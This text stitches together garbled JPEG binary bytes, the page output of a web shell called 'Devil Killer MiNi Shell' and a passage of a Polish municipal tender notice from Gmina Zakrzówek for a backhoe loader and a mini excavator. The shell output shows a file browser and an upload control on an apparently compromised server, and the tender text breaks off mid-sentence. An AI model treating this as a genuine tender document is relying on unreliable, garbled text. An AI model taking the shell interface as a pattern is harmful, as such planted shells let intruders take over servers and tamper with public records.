JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250725/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250725/0034645601-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa koparko-ładowarki i minikoparki </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA ZAKRZÓWEK</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 431020138</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Żeromskiego 24</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Zakrzówek</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">23-213</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL815 - Puławski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gmina@zakrzowek.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zakrzowek.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa koparko-ładowarki i minikoparki </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-7e9435ee-d73d-45f5-b4d0-a66cde174881</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00346456</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-07-25</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00065669/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.2 Dostawa koparko-ładowarki i minikoparki</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zakrzowek.ezamawiajacy.pl/pn/zakrzowek/demand/223537/notice/public/details <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zakrzowek.ezamawiajacy.pl/pn/zakrzowek/demand/223537/notice/public/details</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Sposób (w tym forma) przekazywania ośw. i dok.musi być zgodny z przep.wyd.na podstawie art. 70 PZP, tj.<br/>Rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazyw. inf. oraz wymagań techn. dla dok. elektr. oraz środków komunik. elektr. w postęp.o<br/>udzielenie zamówienia publ. lub konkursie (Dz.U. poz. 2452). W zakresie nieuregulowanym w niniejszym SWZ zastosow. mają przepisy tego rozporządzenia. 2. Zamaw.określa dopuszczalny format podpisu<br/>elektr., jako: a) dokumenty w formacie „pdf&#34; zaleca się podpisywać formatem PAdES, b) dopuszcza się podpisanie dok. w formacie innym niż „pdf&#34;, wtedy będzie wymagany oddzielny plik z podpisem. W<br/>związku z tym Wykonawca będzie zobowiązany załączyć, prócz podp. dokumentu, oddzielny plik z podpisem. c) Zamaw. zaleca, aby w przypadku podp. pliku przez kilka osób, stosować podpisy tego<br/>samego rodzaju. Podpisywanie różnymi rodzajami podpisów np. osobistym i kwalifikowanym może doprowadzić do problemów w weryfikacji plików. 3. Zamaw., określa niezb. wymagania sprzętowo -<br/>aplikacyjne umożliwiające pracę na Platformie Zakupowej tj.: – Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s; – Komputer klasy PC lub MAC spełniający<br/>wymagania zainstalowanego systemu operacyjnego oraz wymagania używanej przeglądarki internetowej; – Zainstalowana dowolna przeglądarka internetowa w wersji wspieranej przez producenta<br/>obsługująca TLS 1.2; – Włączona obsługa JavaScript; – Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf. 4. Zamaw. określa niezbędne wymagania sprzętowo-aplikacyjne<br/>umożliwiające prawidłowe złożenie podpisu elektronicznego: a) Przeglądarka internetowa Microsoft Edge, Chrome, Firefox w wersji wspieranej przez producenta. Rekomendowaną przeglądarką do złożenia<br/>oferty podpisanej elektr. jest Firefox w wersji wpieranej przez producenta. b) Uruchomienie oprogramow.do skł. podpisu wymaga również zainstalow. Java (licencja EPL) w wersji OpenJDK 8 lub Java<br/>(licencja Oracle) w wersji 1.8.0_202 32 bitowej oraz 64 bitowej, pozwalające na przyjmow. przez użytkownika sesyjnych plików cookie oraz obsł. szyfrowanie. Konieczne jest również dod. adresu witryny<br/>platformy eZamawiający (ezamawiający.pl) do wyjątków (exception site list) w Javie. Uwaga: wymaga to uprawnień administr. na komputerze. c)<br/>Zainstaluj dedykowany komponent Szafir SDK oraz aplikację Szafir Host, który odpowiada za obsługę funkcj. podp.elektr. w platformie eZamawiający. Po zainstalowaniu rozszerzenia Szafir SDK oraz aplikacji<br/>Szafir Host należy przeładować bieżącą stronę. d) Przed uruch. platformy eZamawiający, w pierwszej kolejności podłącz czytnik z kartą kryptograficzną do komputera. 5. Informacje dot. odpow.<br/>przygotowania stanowiska znajdą Państwa na stronie:<br/>https://oneplace.marketplanet.pl/przygotuj-stanowisko-pc-wykonujac-ponizsze-kroki 6. Zamawiający określa dopuszczalne formaty przesyłanych danych tj. plików o wielkości do 2 GB w txt, rtf, pdf, xps, odt,<br/>ods, odp, doc, xls, ppt, docx, xlsx,<br/>pptx,csv,jpg,jpeg,tif,tiff,geotiff,png,svg,wav,mp3,avi,mpg,mpeg,mp4,m4a,mpeg4,ogg,ogv,zip,tar,gz,gzip,7z,html,xhtml,css,xml,xsd,gml,rng,xsl,xslt,tsl,xmlsig,xades,pades,cades,asic,asics,sig,xmlenc,dxf,ath,prd.<br/>7. Wśród formatów powszechnych a NIE występujących w Rozp. Rady Ministrów w spr. Krajowych Ram Interoperacyjności, min. wymagań dla rejestrów publ. i wymiany inf. w postaci elektr. oraz minimalnych<br/>wymagań dla syst.teleinformatycznych (Dz.U. z 2017 r. poz. 2247) nie znajdują się: .rar .gif .bmp .numbers .pages. dok.złożone w takich plikach zostaną uznane za złożone nieskutecznie. 8. Zamawiający<br/>określa informacje na temat kodowania i czasu odbioru danych tj.: – Plik załączony przez Wyk. na Platformie Zakupowej i zapisany, widoczny jest w Systemie, jako zaszyfrowany – format kodowania UTF8.<br/>Możliwość otworzenia pliku dostępna jest dopiero po odszyfrowaniu przez Zamaw. po upływie terminu otwarcia ofert.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">KLAUZULA INFORMACYJNA O PRZETWARZANIU DANYCH OSOBOWYCH <br/><br/>Na podstawie art. 19 ust. 1 PZP w związku z art. 13 ust. 1 - 3 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1, z późn. zm.), dalej „RODO”, informuję, iż:<br/><br/><br/>24.1	Administratorem Państwa danych osobowych jest Gmina Zakrzówek, ul. Żeromskiego 24, 23-213 Zakrzówek, adres e-mail: gmina@zakrzowek.pl, nr tel. 81 821 50 02.<br/>24.2	Kontakt z wyznaczonym Inspektorem Ochrony Danych w sprawach dotyczących przetwarzania Państwa danych osobowych oraz realizacji przysługujących Państwu praw związanych z ich przetwarzaniem możliwy jest pod adresem e-mail: iod@data partners.pl.<br/>24.3	Państwa dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO, w celu związanym z postępowaniem o udzielenie zamówienia publicznego pn: „Dostawa koparko-ładowarki i minikoparki” prowadzonego w trybie podstawowym bez negocjacji.<br/>24.4	Odbiorcami Państwa danych osobowych mogą być osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania na podstawie art. 18 oraz art. 74 Ustawy Pzp oraz podmioty, z którymi zawarto umowy powierzenia przetwarzania danych osobowych.<br/>24.5	Państwa dane osobowe będą przechowywane, zgodnie z art. 78 Ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia. Jeżeli okres obowiązywania umowy w sprawie zamówienia publicznego przekracza 4 lata, dane osobowe przechowywane będą przez cały okres obowiązywania umowy w sprawie zamówienia publicznego.<br/>24.6	Posiadają Państwo:<br/>– na podstawie art. 15 RODO prawo dostępu do danych osobowych Państwa dotyczących;<br/>– na podstawie art. 16 RODO prawo do sprostowania danych osobowych Państwa dotyczących*;<br/>– na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych**; <br/>– prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych z siedzibą ul. Stawki 2, 00-193 Warszawa, gdy Państwo uznają, że przetwarzanie danych osobowych dotyczących Państwa narusza przepisy RODO.<br/><br/>24.7	Nie przysługuje Państwu:<br/>–	w związku z art. 17 RODO prawo do usunięcia danych osobowych;<br/>– prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>– na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Państwa danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/><br/>24.8	Podanie przez Państwa danych osobowych jest niezbędne do przeprowadzenia postępowania o udzielenie zamówienia publicznego. Niepodanie danych osobowych wyłącza możliwość udziału w wyżej wymienionym postępowaniu. <br/><br/>*Wyjaśnienie: skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art. 16 RODO, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą. <br/>**Wyjaśnienie: w postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.9.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa koparko-ładowarki i minikoparki, które powinny spełniać minimum następujące parametry techniczne i posiadać następujące wyposażenie:<br/>1	Koparko-ładowarka:<br/>1.1	fabrycznie nowa, rok produkcji 2025<br/>1.2	moc silnika minimum 88 kW<br/>1.3	masa własna minimum 9500 kg<br/>1.4	silnik 4 cylindrowy wysokoprężny z turbodoładowaniem o pojemności min. 3550 cm3<br/>1.5	norma emisji spalin Stage V<br/>1.6	układ hydrauliczny:<br/>1.6.1	pompa wielotłoczkowa o zmiennej pojemności skokowej z układem wyczuwającym obciążenie i regulującym przepływ w poszczególnych sekcjach układu,<br/>1.6.2	wydajność maksymalna pompy hydraulicznej nie mniejsza niż 160 l/min.,<br/>1.6.3	maksymalne ciśnienie w układzie hydraulicznym nie mniejsze niż 200 bar<br/>1.7	układ napędowy:<br/>1.7.1	automatyczny z pełną synchronizacją,<br/>1.7.2	minimum cztery biegi do przodu i trzy biegi do tyłu,<br/>1.7.3	maksymalnie osiągana prędkość nie mniejsza niż 40 km/h do przodu<br/>1.7.4	maszyna wyposażona w automatyczną blokadę zmiennika momentu na 3 i 4 biegu,<br/>1.7.5	napęd na 4 koła,<br/>1.7.6	wszystkie koła skrętne, 3 tryby jazdy, adaptacyjny układ kierowniczy, mniej niż 2 obroty kierownicy do jednego skrajnego położenia kół do drugiego,<br/>1.7.7	układ stabilizacji jazdy,<br/>1.7.8	koła jezdne przednie i tylne równe o rozmiarze minimum 28 cali, opony rolnicze.<br/>1.8	mosty:<br/>1.8.1	wzmocnione, przeznaczone do wytężonej pracy,<br/>1.8.2	blokada mechanizmu różnicowego z ograniczeniem poślizgu,<br/>1.8.3	most przedni wahliwy +/- 10 stopni<br/>1.9	wyposażenie kabiny:<br/>1.9.1	szyby uchylne,<br/>1.9.2	fabryczne ogrzewanie, wentylacja i klimatyzacja, radio z zestawem głośnomówiącym,<br/>1.9.3	amortyzowany obrotowy fotel z pełną regulacją i pasem bezpieczeństwa,<br/>1.9.4	wycieraczki i spryskiwacze na przód i tył,<br/>1.9.5	pełne oświetlenie drogowe wymagane zgodnie z przepisami prawa do poruszania się po drogach publicznych,<br/>1.9.6	oświetlenie robocze LED wymagane wraz z osprzętem koparkowym i ładowarkowym, w tym: halogeny LED przód , tył oraz światła ostrzegawcze – żółte światło sygnalizacyjne tzw. „kogut”<br/>1.10	układ elektryczny:<br/>1.10.1	dwa akumulatory minimum 12 V przystosowany do pracy w ciężkich warunkach,<br/>1.10.2	alternator minimum 12A,<br/>1.10.3	wyłącznik główny prądu.<br/>1.11	osprzęt ładowarkowy:<br/>1.11.1	łyżko-krokodyl o pojemności minimum 1,10 m3 z lemieszem przykręcanym, zębami przykręcanymi,<br/>1.11.2	widły do palet z ramką montowane na przednim szybkozłączu ładowarkowym o udźwigu minimum 3200 kg,<br/>1.11.3	szybkozłącze ładowarkowe hydrauliczne fabryczne,<br/>1.11.4	sterowanie układem ładowarkowym – jednodźwigniowe typu joystick, przełącznikiem zmiany kierunku jazdy,<br/>1.11.5	samo poziomowanie łyżki,<br/>1.11.6	system amortyzacji łyżki ładowarkowej.<br/>1.12	osprzęt koparkowy podsiębierny:<br/>1.12.1	ramię wysuwane teleskopowo,<br/>1.12.2	kąt obrotu łyżki min 170 stopni,<br/>1.12.3	kąt obrotu całego wysięgnika min. 170 stopni,<br/>1.12.4	maksymalna głębokość kopania nie mniejsza niż 5,8 m,<br/>1.12.5	sterowanie układem koparkowym typu joystick nie zintegrowany z fotelem operatora<br/>1.12.6	hak dźwigowy do przenoszenia obiektów<br/>1.12.7	przesuw hydrauliczny ramienia koparkowego<br/>1.12.8	szybkozłącze koparkowe mechaniczne<br/>1.12.9	dodatkowa linia hydrauliczna pod skarpówkę hydrauliczną sterowaną z joysticka<br/>1.12.10	łyżka koparkowa 30 cm,<br/>1.12.11	łyżka koparkowa 60 cm,<br/>1.12.12	łyżka 150 cm skarpowa uchylna hydraulicznie,<br/>1.12.13	błotniki kół przednich i tylnych,<br/>1.12.14	podpory wysuwane hydraulicznie,<br/>1.12.15	gumowe podkładki po podpory.<br/>1.13	gaśnica,<br/>1.14	trójkąt ostrzegawczy,<br/>1.15	dwa komplety kluczyków<br/>1.16	Serwisy w trakcie trwania gwarancji po stronie Wykonawcy 50/150/300/600/900/1200/1500/1800/2100/2400/2700/3000mth <br/>2	Minikoparka:<br/>2.1	rok produkcji minimum 2024<br/>2.2	nadwozie:<br/>1.1.1	kabina ogrzewana i homologowana,<br/>1.1.2	fotel materiałowy amortyzowany,<br/>1.1.3	radio i głośniki,<br/>1.1.4	światła robocze na kabinie i ramieniu,<br/>1.1.5	pojemność zbiornika na paliwo minimum 20 l,<br/>1.1.6	nadwozie mieszczące się w obrysie gąsienic<br/>2.3	układ hydrauliczny:<br/>2.3.1	minimum trzy pompy hydrauliczne o łącznym wydatku minimum 48 l/min,<br/>2.3.2	przedni lemiesz sterowany hydraulicznie<br/>2.3.3	dodatkowy obwód hydrauliczny na ramieniu kopiącym do skarpówki i młota<br/>2.3.4	sterowanie dodatkowym obwodem hydraulicznym i skrętem wysięgnika z joysticka za pomocą elektro-proporcjonalnych przełączników<br/><br/>2.4	układ napędowy:<br/>2.4.1	gąsienice gumowe,<br/>2.4.2	dwie prędkości jazdy: minimum 2 km/h oraz minimum 4 km/h,<br/>2.4.3	regulowana szerokość rozstawu gąsienic w zakresie minimum 990 mm, maksimum 1300 mm,<br/>2.4.4	sterowanie jazdą koparki za pomocą dźwigni oraz pedałów<br/>2.5	silnik:<br/>2.5.1	silnik wysokoprężny Diesla trzycylindrowy,<br/>2.5.2	moc minimalna 13,5 kW,<br/>2.5.3	pojemność min. 1110 cm3,<br/>2.6	parametry robocze:<br/>2.6.1	waga 1950 – 2100 kg,<br/>2.6.2	długie ramię minimum 1300 mm,<br/>2.6.3	głębokość kopania minimum 2400 mm<br/>2.7	wyposażenie:<br/>2.7.1	instrukcja obsługi w języku polskim,<br/>2.7.2	certyfikat CE<br/>2.7.3	szybkozłącze koparkowe hydrauliczne<br/>2.7.4	łyżka skarpowa hydrauliczna 1000 mm<br/>2.7.5	łyżka kopiąca 300 mm<br/>2.7.6	łyżka kopiąca 600 mm<br/>2.8	Serwisy w trakcie trwania gwarancji po stronie Wykonawcy 50/150/300/600/900/1200/1500/1800/2100mth<br/><br/>3	Wykonawca powinien uwzględnić koszty transportu i rozładunku w cenie oferty. Miejsce dostawy to ul. Żeromskiego 24, 23-213 Zakrzówek. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">43261000-0 - Koparki mechaniczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">43261100-1 - Ładowarki mechaniczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">2 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferty będą oceniane odrębnie w zakresie każdego zadania wg podanych niżej kryteriów:<br/>1 Kryteriami oceny ofert są:<br/><br/>1. Cena – 60 pkt<br/>W powyższym kryterium oceniana będzie cena brutto oferty. Maksymalną ilość punktów – 60 pkt. otrzyma oferta z najniższą ceną, pozostałe oferty będą oceniane według następującego wzoru: <br/><br/> Najniższa cena <br/>C = ------------------------------ x 60 pkt<br/> Cena badanej oferty<br/><br/>gdzie: C – ilość punktów, jaką dana oferta otrzyma za cenę oferty brutto<br/><br/><br/>2. Okres gwarancji dla koparko-ładowarki – 20 pkt<br/>W powyższym kryterium oceniany będzie długość okresu wymaganej gwarancji na dostarczoną koparko-ładowarkę. Oferty będą oceniane według następującego następującej metodologii: <br/>Pk = ilość punktów za oferowany okres gwarancji<br/><br/><br/><br/>Długość oferowanej gwarancji	Liczba pkt<br/>36 miesięcy lub 3000mth co nastąpi wcześniej	0 pkt<br/>48 miesięcy lub 3000mth co nastąpi wcześniej	10 pkt<br/>60 miesięcy lub 3000mth co nastąpi wcześniej	20 pkt<br/><br/>Oferty z gwarancją krótszą od minimalnej zostaną odrzucone. Dla oferty bez podania okresu wydłużenia gwarancji zamawiający przyjmie gwarancję minimalną tj. 36 miesięcy. Podanie w ofercie dłuższego niż maksymalny punktowany okres gwarancji spowoduje przyznanie wykonawcy maksymalną liczbę punktów w tym kryterium (ale do umowy zostanie wpisana gwarancja oferowana).<br/><br/><br/>3. Okres gwarancji dla minikoparki – 20 pkt<br/>W powyższym kryterium oceniany będzie długość okresu wymaganej gwarancji na dostarczoną minikoparkę. Oferty będą oceniane według następującego następującej metodologii: <br/>Pm = ilość punktów za oferowany okres gwarancji<br/><br/><br/><br/>Długość oferowanej gwarancji	Liczba pkt<br/>36 miesięcy lub 2100mth co nastąpi wcześniej	0 pkt<br/>48 miesięcy lub 2100mth co nastąpi wcześniej	10 pkt<br/>60 miesięcy lub 2100mth co nastąpi wcześniej	20 pkt<br/><br/>Oferty z gwarancją krótszą od minimalnej zostaną odrzucone. Dla oferty bez podania okresu wydłużenia gwarancji zamawiający przyjmie gwarancję minimalną tj. 36 miesięcy. Podanie w ofercie dłuższego niż maksymalny punktowany okres gwarancji spowoduje przyznanie wykonawcy maksymalną liczbę punktów w tym kryterium (ale do umowy zostanie wpisana gwarancja oferowana).<br/><br/>2 Łączna ilość punktów otrzymanych przez wykonawcę będzie sumą punktów przyznanych w poszczególnych kryteriach.<br/>PO = C + Pk + Pm<br/>Gdzie <br/>PO – suma punktów przyznanych danej 